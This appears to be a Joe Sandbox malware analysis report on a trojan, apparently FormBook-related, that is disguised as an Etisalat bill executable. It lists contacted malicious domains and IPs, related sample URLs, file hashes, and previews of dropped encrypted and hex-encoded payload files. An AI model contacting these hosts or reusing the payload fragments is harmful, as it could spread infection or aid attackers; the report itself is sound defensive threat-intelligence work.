                                    http://www.openshiftstore.com/da29/www.veriosg.xyzexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.sercettopper.com/da29/www.kas-travel.comexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.micheleditrana.comReferer:explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.aerotyneholdings.comexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.sercettopper.comexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://api.msn.com/explorer.exe, 00000003.00000000.1990524827.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4439803552.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.veriosg.xyzReferer:explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://crl.vexplorer.exe, 00000003.00000002.4435480864.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1984137614.0000000000F13000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.cucinaconestilo.comexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.openshiftstore.comexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    103.224.212.212
                                    		www.vietcadao.comAustralia
                                    		133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue
                                    13.248.169.48
                                    		www.aerotyneholdings.comUnited States
                                    		16509AMAZON-02UStrue
                                    190.115.24.78
                                    		www.1wxir.comBelize
                                    		262254DDOS-GUARDCORPBZtrue
                                    76.223.105.230
                                    		micheleditrana.comUnited States
                                    		16509AMAZON-02UStrue
                                    169.239.128.46
                                    		www.myconc.proSeychelles
                                    		61138ZAPPIE-HOST-ASZappieHostGBtrue

                                    General Information

                                    Joe Sandbox version:40.0.0 Tourmaline
                                    Analysis ID:1448570
                                    Start date and time:2024-05-28 15:07:04 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 11m 2s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:9
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:1
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Sample name:Details of Your Etisalat Summary Bill for the Month of May 2024.exe
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winEXE@8/4@11/5
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 60
                                    • Number of non-executed functions: 270
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                    Warnings

                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                    • Report size getting too big, too many NtOpenKey calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • VT rate limit hit for: Details of Your Etisalat Summary Bill for the Month of May 2024.exe

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    09:08:00API Interceptor8090958x Sleep call for process: explorer.exe modified
                                    09:08:32API Interceptor7362146x Sleep call for process: cmstp.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    103.224.212.212jqPZZhDmjh.exeGet hashmaliciousFormBookBrowse
                                    • www.theanhedonia.com/gy14/?Szu8Zp=sJB9xXDMLUearYsOJfMPyoOL09k0Ht7qJDXT7N+Z0c0oohLZUl68J6Fs60bzmHjgtnYtuzz0MQ==&3fzlqX=DtjxV
                                    z2______________________________.exeGet hashmaliciousFormBookBrowse
                                    • www.theanhedonia.com/gy14/?MRmX=sJB9xXC4L0bq2ox6VvMPyoOL09k0Ht7qJDXT7N+Z0c0oohLZUl68J6Fs633JlGPbuQ58&J61h=CBZhCFnx-
                                    file.exeGet hashmaliciousLummaC, Glupteba, PureLog Stealer, RisePro Stealer, SmokeLoader, Stealc, zgRATBrowse
                                    • soclaiebn.xyz/PhpMyAdmin/
                                    22#U0415.exeGet hashmaliciousFormBookBrowse
                                    • www.theanhedonia.com/gy14/?8pB8=qN98lNP8T4bXSv70&NBZlJ=sJB9xXC4L0bq2ox6VvMPyoOL09k0Ht7qJDXT7N+Z0c0oohLZUl68J6Fs633JlGPbuQ58
                                    RFQ-T56797W_1.xlsxGet hashmaliciousFormBook, NSISDropperBrowse
                                    • www.narrativepages.com/ge06/?6l58L2=/ya+08xkyOEL3z3mbFI+CcZs6Ll5ZIz+eS70dlN8tW9HOdaiVOhFBqrIR4wo06Sw4yKSnA==&BL3=KP-PB41
                                    GCeHcfCef8.exeGet hashmaliciousFormBookBrowse
                                    • www.fhstbanknigeria.com/rs10/?s0=3hcrZOpg0bcnkhh15AgNBYOBAaFzA2w39b7OLOTzLX17gT7vmmZNER029cGGSq2teP1k&CB_=7nEpdJs
                                    Audit_Confirmation_pdf.exeGet hashmaliciousFormBookBrowse
                                    • www.brynnwpods.com/ls02/?U2MTG=IjLtFX-X1ru86jf&rrn=BOXRJAyFp7ak5hNUAxrCPIqjpri6yIqDhPKfVNEe46v/rpGYXPOMCZCFlinyM3iKXNZy
                                    SWIFT_LETTER_A1OzGLOB0NH2.exeGet hashmaliciousFormBookBrowse
                                    • www.brynnwpods.com/ls02/?GxoHR=VBjPa4VPhFxDNPj&_ZApkb=BOXRJAyFp7ak5hNUAxrCPIqjpri6yIqDhPKfVNEe46v/rpGYXPOMCZCFlhHtHXyyNqk4
                                    13.248.169.48VSL_BUNKER INQUIRY.exeGet hashmaliciousFormBookBrowse
                                    • www.supermontage.com/9i8t/?4PB=2T5+pGPdigXxZZx8gY/OSLODLjvvwj0MjlV7S+1Ldbgia1Gm71jO+3C1ccfYbIwVvCUgnk/aeboESokRLTli2QWqQuYbgw8p6Q8aB1I7ivKjFloRg7F5nUdQ3eKMHcuV8w==&wdZh=n2Ih08C05RZDa
                                    PDF89gh ReUrgent Quotepdf.exeGet hashmaliciousFormBookBrowse
                                    • www.getjobspie.com/aika/
                                    USD46k Swift_PDF.exeGet hashmaliciousFormBookBrowse
                                    • www.oreh.net/even/
                                    PAYMENT COPY.exeGet hashmaliciousFormBookBrowse
                                    • www.supermontage.com/9i8t/?VlEHDVvh=2T5+pGPdigXxZZx8gY/OSLODLjvvwj0MjlV7S+1Ldbgia1Gm71jO+3C1ccfYbIwVvCUgnk/aeboESokRLTli2QWqQswZxn4Hxw0zC18njeajG3czp+Bsx3U=&BHPD=o2nt
                                    USD46k Swift_PDF.exeGet hashmaliciousFormBookBrowse
                                    • www.oreh.net/even/
                                    w5c8CHID77.exeGet hashmaliciousUnknownBrowse
                                    • crovace.com/images/1/filenames.php
                                    http://domclickext.xyzGet hashmaliciousUnknownBrowse
                                    • domclickext.xyz/lander
                                    P240842_P240843.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                    • www.5redbull.com/ht3d/?_Td4vT=ZL3P5PGPdr&LjqdxdN0=ySrzTuqbYiyLAwBY6em+9ZmTsohlgC2Wb5uHAaPcVSTcIXHVq5qBaAngv1HA17NCZbzO
                                    narud#U017ebenicu 018BH2024.exeGet hashmaliciousFormBookBrowse
                                    • www.playtoown.shop/dd20/?FRcPAJY=z+kmDmqXOSaonEhRZs5Wl2PzvdAdpd9CMMNx8+wPdH51C9fUA+EkzIY35EvCfc9TN9UxgbNWJQ==&KXiD2=yvwhLLV07x4hUne0
                                    8VRN7Hjoig.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                    • www.nativegarden.net/ht3d/?9r4P2=wUVaOlJZblJdDdMRjLfemxLLWBRd24us117/s2Iam/T8vs3Es0GOt4bvK3USgri2KA/F&wDH=FtxdAxlh54YtUPG0
                                    190.115.24.78Statement_PDF.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                    • www.1wapws.top/sn26/?wj=uSlEae22kwIZ4e+ajloGly+itIksrwkKYVWDVDlJ2AhkB4ElKTghaBOhlImS+3+X/WGG&BvI=CR-pfvw0B
                                    bank_transfer_form_pdf.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                    • www.1wapws.top/sn26/?r0=Z0G8Tj7hq8g&JB4TTn=uSlEae22kwIZ4e+ajloGly+itIksrwkKYVWDVDlJ2AhkB4ElKTghaBOhlLSC72esnmnB
                                    DHL_Shipment_Delivery_Notification_27-9-23.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                    • www.1wapws.top/sn26/?1b6txjN=uSlEae3H4HJplenl/VoGly+itIksrwkKYVWDVDlJ2AhkB4ElKTghaBOhlLGCxWuvhzvB&jL3Tdr=PPJHaZ6XBzapN20p
                                    Invoice#23615B001.exeGet hashmaliciousFormBookBrowse
                                    • www.1wapws.top/sn26/?jBZ=uSlEae3H4HJplenl/VoGly+itIksrwkKYVWDVDlJ2AhkB4ElKTghaBOhlLGoumevlxnB&pXQ=LJE0lvk
                                    PO._4300000894.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                    • www.1wapws.top/sn26/?uZXp=uSlEae3H4HJplenl/VoGly+itIksrwkKYVWDVDlJ2AhkB4ElKTghaBOhlLGoumevlxnB&-ZSX=1bxhU
                                    RFQ_8_10_23.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                    • www.1wapws.top/sn26/?0JELpJ=uSlEae3H4HJplenl/VoGly+itIksrwkKYVWDVDlJ2AhkB4ElKTghaBOhlIqStnyUmGGQmHWxMQ==&OJ=Fxoh2R
                                    Ultratech_Alfa_PO_NO.333.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                    • www.1wapws.top/sn26/?CXuDt=uSlEae3H4HJplenl/VoGly+itIksrwkKYVWDVDlJ2AhkB4ElKTghaBOhlIqryWSXoQaXmHW2fg==&6lUt=_2JtWRe8sn9ly
                                    Urgent_Quote.exeGet hashmaliciousFormBookBrowse
                                    • www.1wigun.top/sz94/?UJExkx=X61TKVA8&FR-=uah20gjjpO+yZ/kp2IAhE+NlvmbDpCCBgWyea6RoIR6R5In/8BJ4jCO+QZ925yDhuMvc
                                    z78DHL_CBJ42723152429.exeGet hashmaliciousFormBookBrowse
                                    • www.1wigun.top/sz94/?4hbhG=uah20gjjpO+yZ/kp2IAhE+NlvmbDpCCBgWyea6RoIR6R5In/8BJ4jCO+QZ925yDhuMvc&lVw8Wr=5jfX5pvhQlD02X
                                    TR0zWyH8jZ.exeGet hashmaliciousFormBookBrowse
                                    • www.1wwuwa.top/ar73/?3fQL-lV=EH+nVsadtG5aeyVqEId+KgpfEVrvId6rromTbWOVT9T57CBJlhL0gNVFpxB1ors5KLET&E0D=b8eXzTW0EphdPr

                                    Domains

                                    No context

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    DDOS-GUARDCORPBZhttps://rechrgerte.sbs/Get hashmaliciousUnknownBrowse
                                    • 186.2.171.38
                                    https://rechrgerte.xyz/Get hashmaliciousUnknownBrowse
                                    • 186.2.171.38
                                    https://rechrgerte.shop/Get hashmaliciousUnknownBrowse
                                    • 186.2.171.38
                                    https://appehmrahem.bond/Get hashmaliciousUnknownBrowse
                                    • 186.2.171.38
                                    http://tredildlngviw.icu/Get hashmaliciousUnknownBrowse
                                    • 186.2.171.38
                                    https://tredildlngviw.shop/Get hashmaliciousUnknownBrowse
                                    • 186.2.171.38
                                    https://tredildlngviw.sbs/Get hashmaliciousUnknownBrowse
                                    • 186.2.171.38
                                    https://du-ae.lol/Get hashmaliciousUnknownBrowse
                                    • 186.2.171.38
                                    https://du-ae.shop/Get hashmaliciousUnknownBrowse
                                    • 186.2.171.38
                                    https://durecharga.monster/Get hashmaliciousUnknownBrowse
                                    • 186.2.171.38
                                    TRELLIAN-AS-APTrellianPtyLimitedAUfile.exeGet hashmaliciousCMSBruteBrowse
                                    • 103.224.212.214
                                    HELP_DECRYPT.HTMLGet hashmaliciousUnknownBrowse
                                    • 103.224.212.237
                                    SlHgSOYcMY.exeGet hashmaliciousUnknownBrowse
                                    • 103.224.212.34
                                    Erzs#U00e9bet - #U00e1raj#U00e1nlat k#U00e9r#U00e9se.xlsmGet hashmaliciousFormBookBrowse
                                    • 103.224.212.214
                                    Swift Copy.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                    • 103.224.212.217
                                    0rVlyonS3R.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                    • 103.224.182.246
                                    https://upsmychoicedeals.comGet hashmaliciousUnknownBrowse
                                    • 103.224.212.216
                                    xQAP5P41U8DI.exeGet hashmaliciousRemcosBrowse
                                    • 103.224.182.242
                                    http://free.filesearch.club/?q=grade+9+core+french+textbookGet hashmaliciousUnknownBrowse
                                    • 103.224.212.217
                                    http://learningstudio.aiGet hashmaliciousUnknownBrowse
                                    • 103.224.182.210
                                    AMAZON-02USarm7.nn.elfGet hashmaliciousMiraiBrowse
                                    • 35.176.26.28
                                    mpl.nn.elfGet hashmaliciousMiraiBrowse
                                    • 108.158.165.21
                                    x64.nn.elfGet hashmaliciousMiraiBrowse
                                    • 18.146.134.155
                                    x86.nn.elfGet hashmaliciousMiraiBrowse
                                    • 44.227.45.146
                                    Quarantined Messages.zipGet hashmaliciousUnknownBrowse
                                    • 99.84.9.27
                                    EZPrs0LSHV.elfGet hashmaliciousMiraiBrowse
                                    • 54.97.170.240
                                    Arcadia Aerospace Industries (AAI) - ILSMart - RFQ4567987654.htmlGet hashmaliciousUnknownBrowse
                                    • 13.32.99.33
                                    https://ifewn.mpbolic.com/L6HiIOM/#Bfun@fun.comGet hashmaliciousHTMLPhisherBrowse
                                    • 18.245.31.33
                                    qqyt33.arm6.elfGet hashmaliciousGafgyt, MiraiBrowse
                                    • 54.171.230.55
                                    skt.arm4.elfGet hashmaliciousMiraiBrowse
                                    • 13.250.89.134
                                    ZAPPIE-HOST-ASZappieHostGBt8WeXq3mvS.elfGet hashmaliciousGafgytBrowse
                                    • 185.99.133.18
                                    FpKoJ3MLci.elfGet hashmaliciousGafgytBrowse
                                    • 185.99.133.5
                                    7eerH6chN6.elfGet hashmaliciousGafgytBrowse
                                    • 185.99.133.34
                                    Caa2tySjUN.elfGet hashmaliciousGafgytBrowse
                                    • 185.99.133.34
                                    6bQ8PT9ViT.elfGet hashmaliciousUnknownBrowse
                                    • 185.99.133.18
                                    Fk8heO9U1J.elfGet hashmaliciousGafgytBrowse
                                    • 185.99.133.173
                                    yx3S8wYEkK.elfGet hashmaliciousMirai, GafgytBrowse
                                    • 169.239.146.21
                                    o7EitOEfWr.elfGet hashmaliciousUnknownBrowse
                                    • 169.239.146.21
                                    SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dllGet hashmaliciousCobaltStrikeBrowse
                                    • 169.239.128.124
                                    Z27kR5FZtq.elfGet hashmaliciousMiraiBrowse
                                    • 169.239.146.33
                                    AMAZON-02USarm7.nn.elfGet hashmaliciousMiraiBrowse
                                    • 35.176.26.28
                                    mpl.nn.elfGet hashmaliciousMiraiBrowse
                                    • 108.158.165.21
                                    x64.nn.elfGet hashmaliciousMiraiBrowse
                                    • 18.146.134.155
                                    x86.nn.elfGet hashmaliciousMiraiBrowse
                                    • 44.227.45.146
                                    Quarantined Messages.zipGet hashmaliciousUnknownBrowse
                                    • 99.84.9.27
                                    EZPrs0LSHV.elfGet hashmaliciousMiraiBrowse
                                    • 54.97.170.240
                                    Arcadia Aerospace Industries (AAI) - ILSMart - RFQ4567987654.htmlGet hashmaliciousUnknownBrowse
                                    • 13.32.99.33
                                    https://ifewn.mpbolic.com/L6HiIOM/#Bfun@fun.comGet hashmaliciousHTMLPhisherBrowse
                                    • 18.245.31.33
                                    qqyt33.arm6.elfGet hashmaliciousGafgyt, MiraiBrowse
                                    • 54.171.230.55
                                    skt.arm4.elfGet hashmaliciousMiraiBrowse
                                    • 13.250.89.134

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Temp\autF8D9.tmp

                                    Download File
                                    Process:C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):175938
                                    Entropy (8bit):7.978966402215972
                                    Encrypted:false
                                    SSDEEP:3072:jY2p0TprjqDr8orc3STC3lP+NuEWUy1HZ+BJUtCYNe6iNC1Ybv0jGRHoqFDjL:82qFjq/8ooSTqhEfaNHEqoRHoib
                                    MD5:0B5BB209E95764A71CFB0CA36A95E181
                                    SHA1:B5767757AF322633334CFBFF6292F80A2135C1F9
                                    SHA-256:F48AE8FEE926B2236AD1E43AB1CE82ECFDADA241F2FB0311DCD3501D88A881F8
                                    SHA-512:FAEED7625ECEC33E520BC296618174910370652AB2FEB7058120D0B2AE96E4F79A45C00C7DBC85DACA4C2706F7CB3D8F30EB37A191A9E06820736B1958D2C482
                                    Malicious:false
                                    Reputation:low
                                    Preview:EA06......`P^..I.@z.zws...{...;...N..m.&.O......d.+......?..T...Vo|..@&3..OB..'sY..Y&...;L.yv..1......Am..R.y.Vjw .l.......V..:./..!.q'.....0.l......P.S.....c..L&.p...3.....".Y.s.q`.Mi..).r.^...P.......^...o....&.I.F*...J.U.P......4.).^...../.Vh..=....Vj....Q.C.......;.K..E..T...n..A...].5I..W................._......W.....n:Q:../D..xR.......-....V.`.{..&)..D..?_.f.P^.^s?.G.|....N&y.7..X.i...._...jv.|.Fa\.........P..85.c...*<...q.n.9m.3....1..c........o..3.z<F...W.Y....M.tx..MP.P.ly..Eo..bp..._..#...na...Jt....d....oR.Z...i..-T......S33.t.....P...f....U5.7.........s.....*..?].~...c>.0l&...[...k)...O...ok....a..w....>....U7.G...m.zj.{[..J+.|..D..<?..G.I.......H.Z8.l.ja...+.....x..1W\^.7...v..5....j...E.....4>..a..:U~$Z.....QZ.v.K.Y.0-.v9..B.p?.sm.......H..8..'KyC.H).....>....X}K......j.g...7^=[.......;....u;}%....j6..a8.\.z.....s6V......w...g..@i=].....".......~..y.7....\.Gr.e.wc..5.y.Ya..$R.....YZO~..._f..$.c..U..n>.m.o.......T.Q=.:

                                    C:\Users\user\AppData\Local\Temp\autF919.tmp

                                    Download File
                                    Process:C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):9752
                                    Entropy (8bit):7.594462734656479
                                    Encrypted:false
                                    SSDEEP:192:Q09SJLZ7jNO7shshwkKfNEhaQrV7uDt/Fm/QF6Mo4UWTkmOFV+y1Fp6w:z9SJtjehdUJCduS/QoMoNMkmOL+y1FAw
                                    MD5:B6BF1F476FB9BA827784616B321A3726
                                    SHA1:4819052A291482A7DDC13DBB41AF49F62B3087B5
                                    SHA-256:DD6186939A38E549E39959706A855192EABD15CE4EF5E294BB89E1BB96E23A8C
                                    SHA-512:BC90F6C0D3850025B1F08ECA870304AE43E7A789906A9649FB8E499EEE989DF9A5CDA7B8821A467BC8B228B8BF818D908F54B2E17DC1B9386610AF1F8686D19C
                                    Malicious:false
                                    Reputation:low
                                    Preview:EA06..t..L&.[...e....;..`....y...b.......s8..&...j.%.$.m8..Sp.N.g.....m.X@..K...c.$....lL.`..Ng6)...l.I...b....4..,S@..l.l.-z..f.6|v...Qc.0.......q4.Y..k..h......c ._..p.1....qa.H....9..$l.3..Y@.6...$.a5.H.f@.....|3....fs9..%d.M...5...&.@.@.K.I.....Y.x>9.....Y.j.;.......j.;-....Y@j.9.....K,..1...'.`....|.....,S`..N,`...H.......|....F. ,_...c3..........;..:&.>_L.n....f.G_T......|.).......&.....8...&V....ia...=.....Y......&..`.l..|.[.....Yl ....ab...,@....ib........h.._..@...3|.P.o.ac.....+.....N.i|sk....8..4|.0...c....7....k ..7.X..TD....M&`....g....,,`....>.Y...$.@&....L&.P.....32.|&.G%......h...,..33.%.....BS...Nf......f.4.L,.9."....Bvp.Y...ffS{$..d..,.@8@.......@.3d.L..k4.h..M.B:.Y...fg6.;.ab....98.L..:.....of.L.*..Fp........36.Y&.k,.b...' !...,t.33.4.c2.X.M....#......j.d...[..%3.....c....M'6...ic....!..,..3 k..p....@...L&..........., ....#......f.8.X..K..`....zn........0{.k7....!..,...S.%..9..J@^@.G'.......aa.M..)LM@B:.Y...ffS...r....@...N@.:.....n..Mf@....

                                    C:\Users\user\AppData\Local\Temp\putrefactible

                                    Download File
                                    Process:C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe
                                    File Type:ASCII text, with very long lines (29698), with no line terminators
                                    Category:dropped
                                    Size (bytes):29698
                                    Entropy (8bit):3.537035087934973
                                    Encrypted:false
                                    SSDEEP:768:G3i/vrBPE0VQytmOjE9F4wp5Ji6wNLHll1Nfnr1uLphM:Ui31PEPwmOgGuLDM
                                    MD5:9A1C8103B0C3C11768526EEDF4AC7E0F
                                    SHA1:E3ADE56FAC9423E55A799EB461ABC804F7D25814
                                    SHA-256:8D344587DF89E85DCDE5BC45CB6F470F1813071152198413BE78FF9581838B48
                                    SHA-512:4B6B46DCD5BD7B8081DAE6675120F7352AAAC956F41E9D3A4F47B2F543192386B0A68F16ED7B61849EA563FFC55DDE06F528AE8AD6EFF0389C3E816D1D2CF90C
                                    Malicious:false
                                    Reputation:low
                                    Preview:x055b8ce18cecc20000065758bb6000000669854489b560000006698d468ab27000000669855888be6000000669854a89b560000006698d4c8abc6000000669855e88b33000000669854099b230000006698d429abe2000000669855498b46000000669854699bc60000006698d489abc6000000669855a9330c669854c99be60000006698d844ffffffab4700000066985964ffffff8b4600000066985884ffffff9bc60000006698d8a4ffffffabc6000000669859c4ffffff8be2000000669858e4ffffff9b460000006698d805ffffffabc600000066985925ffffff8bc600000066985845ffffff339c6698d865ffffffab570000006698550d8b370000006698542d9b560000006698d44dab270000006698556d8b330000006698548d9b230000006698d4adabe2000000669855cd8b46000000669854ed9bc60000006698d40eabc60000006698552e330c6698544e9b160000006698d886ffffffab46000000669859a6ffffff8b67000000669858c6ffffff9b160000006698d8e6ffffffab0700000066985907ffffff8b9600000066985827ffffff9b330000006698d847ffffffab2300000066985967ffffff8be200000066985887ffffff9b460000006698d8a7ffffffabc6000000669859c7ffffff8bc6000000669858e7ffffff339c6698d408ab370000006698550a8b86

                                    C:\Users\user\AppData\Local\Temp\undiscernibly

                                    Download File
                                    Process:C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):189440
                                    Entropy (8bit):7.808876876315375
                                    Encrypted:false
                                    SSDEEP:3072:nW1u3CstacDKGU4hv0+WOp8RfJZhtgG/Waa0mVje8CTgrihqsexHXhL0Dp9caif3:1FU4hv0qQfDhtgGHa0I00ihsxxL0DpOv
                                    MD5:6CA95B5ABF42D7234035E349F3E2C7F2
                                    SHA1:72CF24FC3BF8C2426926AAEC738B81D3474FD960
                                    SHA-256:BC8EE91A96683D93D955AA9C1B1355F1588D877EAFC8C606F56C8655C8E5D1C5
                                    SHA-512:F574165FE284B63DE7EBEE8ADA709BA08A97EA923CF1F86C892BFDFC0F4C4302DAE23BBC3BBDAB9B16960EDB81BC80ACC2C01D3C8D7EE92E5F7EB4E766E2DABF
                                    Malicious:false
                                    Reputation:low
                                    Preview:.....8WIT..N....u.YU...;_...VOGW08WITYVOGW08WITYVOGW08WITY.OGW>'.GT._.f.1t.h.1?<g'BW0;54v,&9^W#i6<v=29.Q9i...o*8T]yDYSrOGW08WI..^...V...2..!..8....0..W...2.O...1..05'..V.WITYVOGW08WITYVO..08.HUY^..08WITYVO.W29\H^YV.EW08WITYVO..18WYTYV.EW08.ITIVOGU08RIUYVOGW58VITYVOG.28WKTYVOGW28..TYFOGG08WIDYV_GW08WIDYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYx;"/D8WI@.TOGG08W.VYV_GW08WITYVOGW08wIT9VOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITY

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):6.975314174923486
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:Details of Your Etisalat Summary Bill for the Month of May 2024.exe
                                    File size:1'062'400 bytes
                                    MD5:aa15c6bc55041b534268e0a07c5f0abc
                                    SHA1:0b73953d2ea38ba9e4a996f96eb4426da818b854
                                    SHA256:87f7f23776e3b70ce5a9f4095028edf855402cee27433be2b7d65c513cf25235
                                    SHA512:8de557cfd9cb756fedb7dbe3880dcbd397405b6c3f7802f25010cb9d1bf775309ebd6165253ba7028b7c192a90d741555ac4b55814db4ad25cb054ae97a4f9bf
                                    SSDEEP:24576:rAHnh+eWsN3skA4RV1Hom2KXMmHaWSLwh47/N5:Gh+ZkldoPK8YaWSV/
                                    TLSH:5A35AD0273D2C036FFAB92739B6AF20156BD7D254123852F13981DB9BD701B2267E663
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

                                    File Icon

                                    Icon Hash:aaf3e3e3938382a0

                                    Static PE Info

                                    General

                                    Entrypoint:0x42800a
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x6655B1EB [Tue May 28 10:28:59 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:1
                                    File Version Major:5
                                    File Version Minor:1
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:1
                                    Import Hash:afcdf79be1557326c854b6e20cb900a7

                                    Entrypoint Preview

                                    Instruction
                                    call 00007F864CB4FEBDh
